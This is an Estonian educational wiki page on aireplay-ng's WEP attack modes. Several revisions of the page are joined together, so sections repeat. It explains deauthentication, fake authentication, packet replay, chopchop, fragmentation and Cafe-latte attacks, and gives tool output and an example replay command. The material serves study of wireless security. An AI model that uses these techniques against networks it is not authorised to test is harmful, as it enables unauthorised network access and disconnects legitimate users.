Jee! Saad kasutada xor faili oma paki injectimiseks või lugeda paki sisu .cap failist. Vaata ainult et paki injectimisel kasutad autentitud source maci, väga väheste ruuterite korral töötab paki sisestamine ''broadcasti'' ilma autentimata. Soovitatav on võtta ka lühem pakett kuna dekrüptimise aeg on lineaarselt seotud paketi pikkusega.[10]

==Rünnak 5: Fragmentation attack==
Õnnestumise korral suudab see rünnak tagastada sulle kuni 1500 baiti PRGA'd. See rünnak ei tagasta WEP võtit. Saadud PRGA'ga saab krüptida oma loodud pakette ja neid võrku injectida. Ründamiseks on vaja saada AP'lt vähemalt üks pakett.[12]

Põhimõtteliselt saab programm paketist väikese hulga võtmematerjali ning üritab saata ARP või LLC pakette(kuna selliste pakettide sisu on teada) AP'le. Kui pakett kajatakse tagasi AP poolt siis saab tagastatud paketi põhjal tuletada suurema hulga PRGA baite. Tsüklit saab korrata kuni saadakse kätte kuni 1500 baiti.[12]

See rünnak nõuab head ühendust AP'ga, kuna ründaja fragmenteerib pakette ja AP peab need kõik kätte saama.[12]

<pre>
Saving chosen packet in replay_src-0124-161120.cap
Data packet found!
Sending fragmented packet
Got RELAYED packet!!
Thats our ARP packet!
Trying to get 384 bytes of a keystream
Got RELAYED packet!!
Thats our ARP packet!
Trying to get 1500 bytes of a keystream
Got RELAYED packet!!
Thats our ARP packet!
Saving keystream in fragment-0124-161129.xor
Now you can build a packet with packetforge-ng out of that 1500 bytes keystream
</pre>
Ja meil ongi olemas .xor fail millega saab ''custom'' pakette injectida. Muidugi on vajalik assotsiaseeritud klienti kelle nimelt pakette injectida.[12]

==Rünnak 6: Cafe-latte attack==
Iga WEP klient kes saab ARP päringu vastab sellele automaatselt korrektselt krüptitud ARP vastustega - selle etapini jõudmiseks ei pea AP tõestama et ta WEP võtit teab.
Selle rünnakuga saab kinnipüütud paketis pöörata ümber mõned bitid mille käigus pööratakse kliendi ARP päring ta enda poole tagasi. Saates võltsitud ARP päringut kliendile korduvalt saame kinni püüda suurel hulgal korrektseid krüptitud ARP vastuseid.[13]

See rünnak töötab kuna WEP ei ole nõrk mitte ainult statistilise analüüsi rünnakute vastu, vaid tal puudub ka krüptograafilise tugevusega paki terviklikkuse kontroll.
Lühidalt öeldes ei suuda osapooled eristada võltsitud/modifitseeritud paketti korrektsest pakist.[13]

Iga WEP pakett kasutab CRC checksumi ülekande vigade tuvastamiseks. Ammu aga teatakse et ründaja saab muuta nii paki sisu kui ka CRC'd et luua uus korrektne pakk. Cafe-latte kasutab neid nõrkusi ja muudab ära saatja MACi ja saatja IP aadressi mis sisalduvad kliendi ARP päringus ning suunavad need kliendi vastu.[13]

Kuna klient ei suuda võltsingut eristada, vastabki ka igale päringule.[13]

===Kasutamine===
Seda rünnakut saab kasutada reaalsest võrgust eraldatud kliendi puhul. Kliendid teevad tuntud võrkude otsimisel PROBE päringuid, millele saab ründaja siis fake APga vastata. Sellisel juhul peaks kasutama "-D" argumenti et lülitada välja AP otsimine.[14]

==Rünnak 7: Client-oriented fragmentation attack==
Selle rünnakuga saab kasutada suvalist IP või ARP paketti. See laiendab Cafe-Latte rünnakut lubades kasutada suvalist paketti kliendilt.
Sellest paketist peame genereerima ARP päringu. ARPil peab asuma baidipositsioonil 33 sihtmärgi IP ning sihtmärgi MAC peab olema nullbaidi jada.
Praktikas võib sihtmärgi MAC olla aga suvaline väärtus.[15]

Saadud pakis on teada koht kus asub lähtepunkti IP aadress - bait 23 ARP puhul ja 21 IP puhul. Eeldatakse et pakk on ARP kui paki suurus on 68 või 86 baiti, vastaseljuhul eeldatakse et on IP pakett.[15]

===ARP===
Korrektse ARP päringu saatmiseks kliendile peame liigutama lähtekoha IP aadress positsioonile 33. Muidugi ei saa seda niisama lihtsalt teha - pakk ei valideeruks. Selle vastu kasutame aga paketi fragmenteerimist. ARP saadetakse kliendile kahe fragmendina. Esimese fragmendi pikkus valitakse niimoodi et paketi kokkupanemisel kliendi poolt satuks lähtekoha(kliendi) IP positsioonile 33(sihtmärk). Teine fragment on pakett mis kliendilt alguses saadi.[15]

===IP===
IP paketi puhul kasutatakse sarnast meetodit. Aga kuna PRGA materjali on vähem, siis saadetakse välja kolm fragmenti pluss algne pakk.[15]

Igaljuhul kasutatakse CRC korrektsuse säilitamiseks bit-flippingut. Sama meetodit kasutatakse ka ARP paketi lähtekoha MAC'i muutmiseks juhul kui seal on algselt ''multicast''.[15]

=Viited=
[1] http://www.aircrack-ng.org/doku.php?id=aireplay-ng

[2] http://www.aircrack-ng.org/doku.php?id=deauthentication

[3] http://www.aircrack-ng.org/doku.php?id=fake_authentication

[4] https://secure.wikimedia.org/wikipedia/en/wiki/Wired_Equivalent_Privacy

[5] http://documentation.netgear.com/reference/sve/wireless/WirelessNetworkingBasics-3-08.html

[6] http://documentation.netgear.com/reference/sve/wireless/WirelessNetworkingBasics-3-09.html

[7] http://www.aircrack-ng.org/doku.php?id=shared_key

[8] http://www.aircrack-ng.org/doku.php?id=interactive_packet_replay

[9] http://www.aircrack-ng.org/doku.php?id=arp-request_reinjection

[10] http://www.aircrack-ng.org/doku.php?id=korek_chopchop

[11] http://www.informit.com/guides/content.aspx?g=security&seqNum=197

[12] http://www.aircrack-ng.org/doku.php?id=fragmentation

[13] http://www.wi-fiplanet.com/tutorials/article.php/10724_3716241_2

[14] http://www.aircrack-ng.org/doku.php?id=cafe-latte

[15] http://www.aircrack-ng.org/doku.php?id=hirte

\[\[Category:Traadita_side_alused]]

Aireplay-ng ründerežiimid

2011-05-10T10:36:03Z

Tliiv: /* Rünnak 6: Cafe-latte attack */

=Sissejuhatus=

Aireplay-ng`d kasutatakse ''frame''`de sisestamiseks võrguliiklusesse.[1]

Peamine funktsioon on liikluse genereerimine hilisemaks kasutamiseks aircrack-ng`s - [https://secure.wikimedia.org/wikipedia/en/wiki/Wired_Equivalent_Privacy WEP] ja [https://secure.wikimedia.org/wikipedia/en/wiki/WPA-PSK WPA-PSK] võtmete lahtimurdmiseks. Erinevad rünnakuviisid võimaldavad tekitada deautentimist WPA ''handshake'' pakettide püüdmiseks, võlts deautentimiseks, interaktiivseks pakettide taasmängimiseks ja käsitsi valmistatud ARP päringute sisestamiseks liiklusesse.[1]

=Eelteadmised=
WEP ja WPA/WPA2 võrkude ründamiseks on vajalikud mõned konkreetsed eelteadmised. Nende teadmine lihtsustab suurel määral võimalike probleemide lahendamist ja annab paremini aimu millega tegu on ja kuidas asjad ''backendis'' töötavad - ei teki näiteks viga kus üritatakse taasmängida paketti kui ühtegi klienti pole APga assotsiaseerunud.

Samuti eeldatakse et teatakse aireplay-ng põhikäske ja argumente - nullist õppimiseks ei ole see mõeldud.

==WEP==
WEPi ründamiseks on vaja eristada Open Authentication ja Shared Key Authentication süsteemi
===Open Authentication===
[http://documentation.netgear.com/reference/sve/wireless/images/WEPauthenticationOpen.jpg][5]

* Klient saadab autentimis päringu AP'le.[5]
* AP autentib kliendi.[5]
** AP laseb selles etapis kõik kliendid läbi, st. mingit autentimist(sõna otseses mõttes) ei toimu[5]
* Klient assotsiaseerub AP'ga ja liitub võrguga.[5]
** Selles etapis hakkavad mõlemad osapooled andmeid saatma WEPi krüpteeringuga, st. edasiseks suhtlemiseks on vaja teada salajast võtit. Sellesse punkti jõudes on võimalik assotsiaseerunud kliendi MACiga saata AP'le pakette(nõrkus).[5]

===Shared Key Authentication===
[http://documentation.netgear.com/reference/sve/wireless/images/WEPauthenticationShared.jpg] [6]

* Klient saadab autentimise päringu AP'le.[6]
* AP saadab kliendile ''random'' baidijada(ülesanne).[6]
* Klient kasutab oma 64- või 128bitist salajast võtit ning krüptib saadud baidijada ära, ning saadab tagasi AP'le.[6]
* AP dekrüptib saadud jada ning võrdleb seda esialgu väljasaadetud stringiga, kui need ei kattu, siis saadetakse kliendile negatiivne vastus. Kui kattub siis järelikult on kliendil ja AP'l sama WEP võti, ning AP autentib kliendi ära.[6]
* Klient ühendub võrku.[6]

Sellisel juhul ei ole võimalik autentimisest edasi saada ilma võtmeta, ning seega ei saa ka AP'le pakke võrku sisestada. (Lahendus probleemile on #Shared Key Authentication artikli all)

=Meetodid=
Meetodite pealkrijade ees on "Rünnak x:". x tähistab numbrit mitmes implementeeritud rünnak see on ja seda numbrit aksepteerib aireplay-ng ka vastava käsurea lipu argumendina.
==Rünnak 0: Deauthentication==

See meetod saab disassotsiaseerumise paketi ühele või rohkemale kliendile kes on parasjagu vastava ''access pointiga'' assotsiaseerunud. Klientide lahtiühendamisel võib olla mitu eesmärki:[2]

* Peidetud ESSID kättesaamine. See on ESSID mida access point ei kuuluta ''broadcastis''.[2]
* WPA/WPA2 handshake kinnipüüdmine sundides klienti uuesti autentima.(Ei ole kohustuslik, võib oodata ka kuni klient ise uuesti ühendub)[2]
* ARP päringute genereerimine(Windowsi kliendid võivad mõnikord oma ARP ''cache'' tühjendada kui ühendus ära kaob)[2]

NB! Arusaadavalt on see rünnak täiesti kasutu kui traadita ühenduspunkti küljes ei ole ühtegi reaalset assotsiaseerunud klienti või võlts autentitud klienti.[2]

===Meetodid===

====Suunatud====
<pre>Waiting for beacon frame (BSSID: 00:14:6C:7E:40:80) on channel 9
12:35:25 Sending 64 directed DeAuth. STMAC: [00:0F:B5:AE:CE:9D] [ 61|63 ACKs]</pre>

* BSSID peab olema sihtmärk AP korrektne MAC aadress[2]
* kanal peab olema sama millel AP reaalselt räägib[2]
* STMAC on rünnatava kliendi korrektne MAC aadress[2]

* '''Sending 64 directed''' - saadeti välja 64 suunatud deautentimise paketti, st. 64 kliendile ja 64 AP'le.[2]
* '''61''' - mitu paketti klient kätte sai[2]
* '''63''' - mitu paketti AP kätte sai[2]

Kui 61 ja 63 on arvud mis on suhteliselt stabiilsed ja lähedal 64'le, siis tähendab see seda et mõlemad osapooled on sinu võrgukaardi antennist kuuldekaugusel ja nendega on võimalik infot vahetada. Kui üks neist numbritest on väike, siis tähendab seda et asud vastavast osapoolest liiga kaugel - sellisel juhul see rünnak ei tööta, sul on vaja kas saatja saatevõimet suurendada, või minna osapoolele füüsiliselt lähemale.[2]

Suunatud ''versus'' broadcast olukorras on alati soovitav kasutada suunatud varianti, kuna paljud kliendid ignoreerivad broadcastis saadetud lahtiühendamise paketti.[2]

Kui sulle kliendi ACK'ide arv tundub korrektne, aga sulle ikkagi ei tundu et ta ennast lahti ühendaks, siis võib probleem peituda selles et ta ühendub uuesti liiga kiiresti.[2]

====Broadcast====
<pre>Waiting for beacon frame (BSSID: 00:14:6C:7E:40:80) on channel 9
NB: this attack is more effective when targeting
a connected wireless client (-c <client's mac>).
15:49:32 Sending DeAuth to broadcast -- BSSID: [00:14:6C:7E:40:80]</pre>

Nagu mainitud, ''broadcast'' lahtiühendamine on vähem efektiivsem.

==Rünnak 1: Fake authentication==
Võlts autentimine lubab läbi viia nii Open System kui ka Shared Key WEP autentimist, peale selle teeb ta ka assotsiatsiooni access pointiga. See on kasulik ainult siis kui sul on vaja AP'le pakettide saatmiseks assotsiaseeritud klienti, selle puudumisel ei võta AP ühtegi talle saadetud pakki vastu. Kui meil on aga reaalne klient, siis saame tema nimel pakke saata, kui pole, on vaja võlts autentimist.
Võlts autentimine ei tekita ARP pakette(seega ei piisa selle üksi kasutamisest) ja ei suuda assotsiaseeruda WPA/WPA2 access pointidega.[3]

Fake authenticationit ei tohi kasutada aktiivse kliendi MACiga. See on eriti sobilik meetod selliseks juhuks kui olemasolevalt kliendilt on kinni püütud näiteks ARP pakett, ning klient ühendub lahti enne kui suudad piisavalt arp pakette tagasi mängida. Sellisel juhul aitab sama kliendi MACiga fake autentimine ning siis seda kinnipüütud pakki uuesti/edasi mängida.

===Meetodid===
====Open Authentication====
Open authentication puhul ei üritata klienti enne assotsiaseerumist autentida, seega saame kerge vaevaga ennast ära assotsiaseeruda ning hakata AP'ga suhtlema. Selles etapis hakkavad tavakliendid WEP'i(ja seega ka salajast võtit) kasutades rääkima, meie aga saame sisestada juba korrektse võtmega krüptitud(reaalselt kliendilt varem püütud) pakke AP'le saatma, uuesti ja uuesti.[4]
<pre>18:18:20 Sending Authentication Request
18:18:20 Authentication successful
18:18:20 Sending Association Request
18:18:20 Association successful :-)</pre>
Sellisel juhul on assotsiaseerumine õnnestunud võib jätkata teiste rünnakutega - AP võtab vastu vastavalt MACilt tulevaid pakke, ja saadab õigetes tingimustes ka vastuseid.[4]

====Shared Key Authentication====
SKA tähendab seda, et AP ei räägi potensiaalse kliendiga mitte midagi, va. WEP võtmega autentimise protokoll, seega ei ole võimalik meil AP'ga assotsiaseeruda(me ei tea ju salajast võtit millega autentimisel AP saadetud puzzle ära "lahendada") ning sellest tulenevalt ei saa me ka AP'le mingeid pakke saata.
<pre>15:46:53 Sending Authentication Request
15:46:53 AP rejects open-system authentication
Please specify a PRGA-file (-y).</pre>

Sellisel juhul on vaja kinni püüda SKA ''handshake'' paketid. See toimub automaatselt kui airodump-ng näeb mõnda WEP-SKA handshake'i. Deauthentimise rünnakuga saab seda olemasolevale kliendile sundida.[7]

Kinnipüütud ''handshake''`id salvestatakse "sharedkey-01-00-14-6C-7E-40-80.xor" formaadis faili. See fail tuleb vastavasse AP'sse fake autentimisel/kliendi disconnectimisks anda kaasa "-y" käsurea argumendiga.[7]

NOTE: Kui airodump-ng jookseb ilma aktiivseid rünnakuid AP pihta tegemata, siis on AUTH väli WEP AP taga tühi. Kui airodump-ng näeb mända handshake'i siis tuleb AUTH välja sisse SKA, samal hetkel salvestatakse ka fail.[7]

==Rünnak 2: Interactive packet replay==

See rünnak lubab valida konkreetse paketti mida taasmängida. Selle meetodiga saab pakette lugeda kahest kohast, võrgust ja failist. Keskendume võrgust püüdmisele.
Et interaktiivne uuestimängimine töötaks on tähtis veidi alusteadmisi paketivoo kohta. Iga pakett ei tööta selle rünnakuga. Õnnestumine tähendab seda et AP võtab paki vastu ja genereerib uue IV - WEP ründamiseks on vaja ju koguda palju IV'sid.
Väga kasulik on panna peale ka "-m 68 -n 86" filtrid. Need filtreerivad vastavalt minimaalse paki suuruse(68- traadita klientilt) ja maksimaalse(86- traadiga kliendilt). Need on WEP ühenduses ARP pakettide suurused ning õigesti kasutades peaksid tagama vastuse AP poolt.[8]

===Naturaalsed paketid===

Et seda teha, tuleb meil kas taasmängida originaalpaketti, või paketti veidi manipuleerida. AP'd edastavad(tekitavad uue IV) alati pakkidele mis on suunatud broadcast MACi(FF:FF:FF:FF:FF:FF) vastu. Selline omadus on näiteks ARP pakettidel. Peale selle on vajalik et pakett liiguks traadita kliendist traadiga võrku. Sellisel pakettil on "To DS" lipuke seatud "1" peale.
Need filtrid on seadistatavad -b,-d ja -t argumentidega.[8]

===Manipuleeritavad pakid===

Eesmärk, nagu alati, on panna AP genereerima uusi IV'sid. Ainuke vajalik argument on "-t 1" - see selekteerib ainult pakette mis liiguvad etherneti suunas.

Me ei hooli ka mis lõppunkti MAC aadress on, kuna me saame selle ära muuta. Selleks on "-p 0841" argument, mis muudab paki põhimõtte selliseks nagu ta saadetaks kliendist AP'sse - põmst. muudab "To DS" lipu "1". Vaja on anda ka "-c" väärtuseks broadcast MAC.[8]

===Klientideta võrgu ründamine===
Sellel meetodil on väga huvitav omadus see, et saab rünnata ka traadita-klientideta AP'd. Jooksuta aireplay-d kõige elementaarsemate argumentidega:
<pre>aireplay-ng -2 -b 00:14:6C:7E:40:80 -d FF:FF:FF:FF:FF:FF -t 1 ath0</pre>

Nüüd jääb üle vaid oodata kuni mõni pakett broadcasti saadetakse. Pole tähtis milline pakket, sisesta lihtsalt "y" esimesele tulevale pakile ja AP hakkab IV'sid genereerima. Negatiivne külg asjal on tõsiasi et paljud pakid on suhteliselt suured - suured pakid genereerivad IV'sid aeglasemalt. Suur pluss on see et ei ole vaja kinni püüda xor paketistriimi(chopchop või fragmenteeritud rünnakud), ehitada pakki ja käivitada relay rünnakut.[8]

==Rünnak 3: ARP request replay attack==
Klassikaline ARP päringu taasmängimise rünnak on efektiivseim viis IV'de genereerimiseks, ja ta töötab ka piisavalt stabiilselt. Programm kuulab ARP paketti(tunneb ära kindlate mittekrüptimata väljade järgi ja paki pikkuse järgi) ning hakkab seda AP'le taasmängima. See omakorda põhjustab igale päringu vastusele uue IV genereerimise.
Seda rünnakut võib lugeda interaktiivse taasmängimise erijuhuks.[9]

==Rünnak 4: KoreK chopchop attack==
See rünnak suudab hea õnne korral dekrüptida WEP paketi ilma salajast võtit teadmata. Meetod võib töötada isegi dünaamilise WEP vastu. See rünnak ei tagasta sulle WEP salajast võtit, vaid paketi sisu ja selle paketi krüptimiseks kasutatud keystreami. Mõned AP'd ei ole sellele rünnakule avatud. Kui AP dropib pakke mille pikkus on alla 42 baidi, siis aireplay üritab ülejäänud baidid ära arvata - edukuse tõenäosus oleneb headerite ennustusvõimest. Kui püütakse kinni IP pakett, siis tehakse lisaks veel checksum kontroll peale arvatava lisabaitide juurdelisamist. Rünnakuks on vaja vähemalt ühte WEP paketti.[10]

===Teooria===
KoreK kasutab hästituntud nõrga ICV[link] probleemi ja järeldab sellest, et kui pakki lühendada ühe baidi võrra, siis saab sellest ehitada uue korrektse paki, kuna uus ICV on otseselt seotud puuduva krüptimata baidiga. [11]

Esimene samm on võtta püütud pakett (M) ja eemaldada viimane bait, et saada sõnum M-1. Kuna me ei tea eemaldatud baidi ''plaintekst'' väärtust, peame hakkama seda arvama. Õnneks on ainult 256 võimalikku baidiväärtust. Esmaks eeldame siis et eemaldatud bait oli 0x00 ja paneme saadud sõnumi valemisse(liiga mahukas et siin kirjeldada), et luua abitmask mis üritab muuta ebakorrektset M-1 paketti valiidseks M-1 paketiks. Siis proovime paki korrektsust pritsides selle võrku. Kui AP selle kätte saab, siis kontrollitakse seda ja vastavalt aksepteeritakse või ignoreeritakse. Iga saadetud pakk baseerub arvataval baidil, niiet tõenäosus õige olla on 1/256. Kui pakett on aga õige, siis AP valideerib selle ja edastab võrku. Eeldades et sa samal ajal kuulad võrku saad näha kui AP seda teeb. Sellisel juhul tead mis on paki viimane bait. Siis on võimalik arvutada PRGA väärtus mida kasutati selle plaintekst baidi krüptimiseks(P XOR M = RC4 PRGA). Ühesõnaga, ründaja saab bait baidi haaval kogu paketi niimoodi ära arvata, boonuseks on ka keystream millega saad oma paki luua.[11]

<pre> .........
Offset 38 (90% done) | xor = FD | pt = 08 | 229 frames written in 688ms
Offset 37 (92% done) | xor = 13 | pt = 01 | 232 frames written in 695ms
Offset 36 (94% done) | xor = 83 | pt = 00 | 19 frames written in 58ms
Offset 35 (96% done) | xor = 4E | pt = 06 | 230 frames written in 689ms
Sent 957 packets, current guess: B9...

The AP appears to drop packets shorter than 35 bytes.
Enabling standard workaround: ARP header re-creation.

Saving plaintext in replay_dec-0201-191706.cap
Saving keystream in replay_dec-0201-191706.xor

Completed in 21s (2.29 bytes/s)</pre>
Jee! Saad kasutada xor faili oma paki injectimiseks või lugeda paki sisu .cap failist. Vaata ainult et paki injectimisel kasutad autentitud source maci, väga väheste ruuterite korral töötab paki sisestamine ''broadcasti'' ilma autentimata. Soovitatav on võtta ka lühem pakett kuna dekrüptimise aeg on lineaarselt seotud paketi pikkusega.[10]

==Rünnak 5: Fragmentation attack==
Õnnestumise korral suudab see rünnak tagastada sulle kuni 1500 baiti PRGA'd. See rünnak ei tagasta WEP võtit. Saadud PRGA'ga saab krüptida oma loodud pakette ja neid võrku injectida. Ründamiseks on vaja saada AP'lt vähemalt üks pakett.[12]

Põhimõtteliselt saab programm paketist väikese hulga võtmematerjali ning üritab saata ARP või LLC pakette(kuna selliste pakettide sisu on teada) AP'le. Kui pakett kajatakse tagasi AP poolt siis saab tagastatud paketi põhjal tuletada suurema hulga PRGA baite. Tsüklit saab korrata kuni saadakse kätte kuni 1500 baiti.[12]

See rünnak nõuab head ühendust AP'ga, kuna ründaja fragmenteerib pakette ja AP peab need kõik kätte saama.[12]

<pre>
Saving chosen packet in replay_src-0124-161120.cap
Data packet found!
Sending fragmented packet
Got RELAYED packet!!
Thats our ARP packet!
Trying to get 384 bytes of a keystream
Got RELAYED packet!!
Thats our ARP packet!
Trying to get 1500 bytes of a keystream
Got RELAYED packet!!
Thats our ARP packet!
Saving keystream in fragment-0124-161129.xor
Now you can build a packet with packetforge-ng out of that 1500 bytes keystream
</pre>
Ja meil ongi olemas .xor fail millega saab ''custom'' pakette injectida. Muidugi on vajalik assotsiaseeritud klienti kelle nimelt pakette injectida.[12]

==Rünnak 6: Cafe-latte attack==
Iga WEP klient kes saab ARP päringu vastab sellele automaatselt korrektselt krüptitud ARP vastustega - selle etapini jõudmiseks ei pea AP tõestama et ta WEP võtit teab.
Selle rünnakuga saab kinnipüütud paketis pöörata ümber mõned bitid mille käigus pööratakse kliendi ARP päring ta enda poole tagasi. Saates võltsitud ARP päringut kliendile korduvalt saame kinni püüda suurel hulgal korrektseid krüptitud ARP vastuseid.[13]

See rünnak töötab kuna WEP ei ole nõrk mitte ainult statistilise analüüsi rünnakute vastu, vaid tal puudub ka krüptograafilise tugevusega paki terviklikkuse kontroll.
Lühidalt öeldes ei suuda osapooled eristada võltsitud/modifitseeritud paketti korrektsest pakist.[13]

Iga WEP pakett kasutab CRC checksumi ülekande vigade tuvastamiseks. Ammu aga teatakse et ründaja saab muuta nii paki sisu kui ka CRC'd et luua uus korrektne pakk. Cafe-latte kasutab neid nõrkusi ja muudab ära saatja MACi ja saatja IP aadressi mis sisalduvad kliendi ARP päringus ning suunavad need kliendi vastu.[13]

Kuna klient ei suuda võltsingut eristada, vastabki ka igale päringule.[13]

===Kasutamine===
Seda rünnakut saab kasutada reaalsest võrgust eraldatud kliendi puhul. Kliendid teevad tuntud võrkude otsimisel PROBE päringuid, millele saab ründaja siis fake APga vastata. Sellisel juhul peaks kasutama "-D" argumenti et lülitada välja AP otsimine.[14]

==Rünnak 7: Client-oriented fragmentation attack==
Selle rünnakuga saab kasutada suvalist IP või ARP paketti. See laiendab Cafe-Latte rünnakut lubades kasutada suvalist paketti kliendilt.
Sellest paketist peame genereerima ARP päringu. ARPil peab asuma baidipositsioonil 33 target IP ja target MAC peab olema nullbaidi jada.
Praktikas võib target MAC olla aga suvaline väärtus.[15]

Saadud pakis on teada koht kus asub source IP - bait 23 ARP puhul ja 21 IP puhul. Eeldatakse et pakk on ARP kui paki suurus on 68 või 86 baiti, vastaseljuhul eeldatakse et on IP pakett.[15]

Valiidse ARP päringu saatmiseks kliendile peame liigutama source IP positsioonile 33. Muidugi ei saa seda niisama lihtsalt teha - pakk ei valideeruks. Selle vastu kasutame aga paketi fragmenteerimist. ARP saadetakse kliendile kahe fragmendina. Esimese fragmendi pikkus valitakse niimoodi et paketi kokkupanemisel kliendi poolt satuks incoming source IP positsioonile 33. Teine fragment on pakett mis kliendilt alguses saadi.[15]

IP Paketi puhul kasutatakse sarnast meetodit. Aga kuna PRGA materjali on vähem, siis saadetakse välja kolm fragmenti pluss algne pakk.[15]

Igaljuhul kasutatakse CRC korrektsuse säilitamiseks bit-flippingut. Sama meetodit kasutatakse ka ARP paketi source MAC'i muutmiseks juhul kui seal on algselt multicast.[15]

=Viited=
[1] http://www.aircrack-ng.org/doku.php?id=aireplay-ng

[2] http://www.aircrack-ng.org/doku.php?id=deauthentication

[3] http://www.aircrack-ng.org/doku.php?id=fake_authentication

[4] https://secure.wikimedia.org/wikipedia/en/wiki/Wired_Equivalent_Privacy

[5] http://documentation.netgear.com/reference/sve/wireless/WirelessNetworkingBasics-3-08.html

[6] http://documentation.netgear.com/reference/sve/wireless/WirelessNetworkingBasics-3-09.html

[7] http://www.aircrack-ng.org/doku.php?id=shared_key

[8] http://www.aircrack-ng.org/doku.php?id=interactive_packet_replay

[9] http://www.aircrack-ng.org/doku.php?id=arp-request_reinjection

[10] http://www.aircrack-ng.org/doku.php?id=korek_chopchop

[11] http://www.informit.com/guides/content.aspx?g=security&seqNum=197

[12] http://www.aircrack-ng.org/doku.php?id=fragmentation

[13] http://www.wi-fiplanet.com/tutorials/article.php/10724_3716241_2

[14] http://www.aircrack-ng.org/doku.php?id=cafe-latte

[15] http://www.aircrack-ng.org/doku.php?id=hirte

\[\[Category:Traadita_side_alused]]

Aireplay-ng ründerežiimid

2011-05-10T10:30:24Z

Tliiv: /* Rünnak 5: Fragmentation attack */

=Sissejuhatus=

Aireplay-ng`d kasutatakse ''frame''`de sisestamiseks võrguliiklusesse.[1]

Peamine funktsioon on liikluse genereerimine hilisemaks kasutamiseks aircrack-ng`s - [https://secure.wikimedia.org/wikipedia/en/wiki/Wired_Equivalent_Privacy WEP] ja [https://secure.wikimedia.org/wikipedia/en/wiki/WPA-PSK WPA-PSK] võtmete lahtimurdmiseks. Erinevad rünnakuviisid võimaldavad tekitada deautentimist WPA ''handshake'' pakettide püüdmiseks, võlts deautentimiseks, interaktiivseks pakettide taasmängimiseks ja käsitsi valmistatud ARP päringute sisestamiseks liiklusesse.[1]

=Eelteadmised=
WEP ja WPA/WPA2 võrkude ründamiseks on vajalikud mõned konkreetsed eelteadmised. Nende teadmine lihtsustab suurel määral võimalike probleemide lahendamist ja annab paremini aimu millega tegu on ja kuidas asjad ''backendis'' töötavad - ei teki näiteks viga kus üritatakse taasmängida paketti kui ühtegi klienti pole APga assotsiaseerunud.

Samuti eeldatakse et teatakse aireplay-ng põhikäske ja argumente - nullist õppimiseks ei ole see mõeldud.

==WEP==
WEPi ründamiseks on vaja eristada Open Authentication ja Shared Key Authentication süsteemi
===Open Authentication===
[http://documentation.netgear.com/reference/sve/wireless/images/WEPauthenticationOpen.jpg][5]

* Klient saadab autentimis päringu AP'le.[5]
* AP autentib kliendi.[5]
** AP laseb selles etapis kõik kliendid läbi, st. mingit autentimist(sõna otseses mõttes) ei toimu[5]
* Klient assotsiaseerub AP'ga ja liitub võrguga.[5]
** Selles etapis hakkavad mõlemad osapooled andmeid saatma WEPi krüpteeringuga, st. edasiseks suhtlemiseks on vaja teada salajast võtit. Sellesse punkti jõudes on võimalik assotsiaseerunud kliendi MACiga saata AP'le pakette(nõrkus).[5]

===Shared Key Authentication===
[http://documentation.netgear.com/reference/sve/wireless/images/WEPauthenticationShared.jpg] [6]

* Klient saadab autentimise päringu AP'le.[6]
* AP saadab kliendile ''random'' baidijada(ülesanne).[6]
* Klient kasutab oma 64- või 128bitist salajast võtit ning krüptib saadud baidijada ära, ning saadab tagasi AP'le.[6]
* AP dekrüptib saadud jada ning võrdleb seda esialgu väljasaadetud stringiga, kui need ei kattu, siis saadetakse kliendile negatiivne vastus. Kui kattub siis järelikult on kliendil ja AP'l sama WEP võti, ning AP autentib kliendi ära.[6]
* Klient ühendub võrku.[6]

Sellisel juhul ei ole võimalik autentimisest edasi saada ilma võtmeta, ning seega ei saa ka AP'le pakke võrku sisestada. (Lahendus probleemile on #Shared Key Authentication artikli all)

=Meetodid=
Meetodite pealkrijade ees on "Rünnak x:". x tähistab numbrit mitmes implementeeritud rünnak see on ja seda numbrit aksepteerib aireplay-ng ka vastava käsurea lipu argumendina.
==Rünnak 0: Deauthentication==

See meetod saab disassotsiaseerumise paketi ühele või rohkemale kliendile kes on parasjagu vastava ''access pointiga'' assotsiaseerunud. Klientide lahtiühendamisel võib olla mitu eesmärki:[2]

* Peidetud ESSID kättesaamine. See on ESSID mida access point ei kuuluta ''broadcastis''.[2]
* WPA/WPA2 handshake kinnipüüdmine sundides klienti uuesti autentima.(Ei ole kohustuslik, võib oodata ka kuni klient ise uuesti ühendub)[2]
* ARP päringute genereerimine(Windowsi kliendid võivad mõnikord oma ARP ''cache'' tühjendada kui ühendus ära kaob)[2]

NB! Arusaadavalt on see rünnak täiesti kasutu kui traadita ühenduspunkti küljes ei ole ühtegi reaalset assotsiaseerunud klienti või võlts autentitud klienti.[2]

===Meetodid===

====Suunatud====
<pre>Waiting for beacon frame (BSSID: 00:14:6C:7E:40:80) on channel 9
12:35:25 Sending 64 directed DeAuth. STMAC: [00:0F:B5:AE:CE:9D] [ 61|63 ACKs]</pre>

* BSSID peab olema sihtmärk AP korrektne MAC aadress[2]
* kanal peab olema sama millel AP reaalselt räägib[2]
* STMAC on rünnatava kliendi korrektne MAC aadress[2]

* '''Sending 64 directed''' - saadeti välja 64 suunatud deautentimise paketti, st. 64 kliendile ja 64 AP'le.[2]
* '''61''' - mitu paketti klient kätte sai[2]
* '''63''' - mitu paketti AP kätte sai[2]

Kui 61 ja 63 on arvud mis on suhteliselt stabiilsed ja lähedal 64'le, siis tähendab see seda et mõlemad osapooled on sinu võrgukaardi antennist kuuldekaugusel ja nendega on võimalik infot vahetada. Kui üks neist numbritest on väike, siis tähendab seda et asud vastavast osapoolest liiga kaugel - sellisel juhul see rünnak ei tööta, sul on vaja kas saatja saatevõimet suurendada, või minna osapoolele füüsiliselt lähemale.[2]

Suunatud ''versus'' broadcast olukorras on alati soovitav kasutada suunatud varianti, kuna paljud kliendid ignoreerivad broadcastis saadetud lahtiühendamise paketti.[2]

Kui sulle kliendi ACK'ide arv tundub korrektne, aga sulle ikkagi ei tundu et ta ennast lahti ühendaks, siis võib probleem peituda selles et ta ühendub uuesti liiga kiiresti.[2]

====Broadcast====
<pre>Waiting for beacon frame (BSSID: 00:14:6C:7E:40:80) on channel 9
NB: this attack is more effective when targeting
a connected wireless client (-c <client's mac>).
15:49:32 Sending DeAuth to broadcast -- BSSID: [00:14:6C:7E:40:80]</pre>

Nagu mainitud, ''broadcast'' lahtiühendamine on vähem efektiivsem.

==Rünnak 1: Fake authentication==
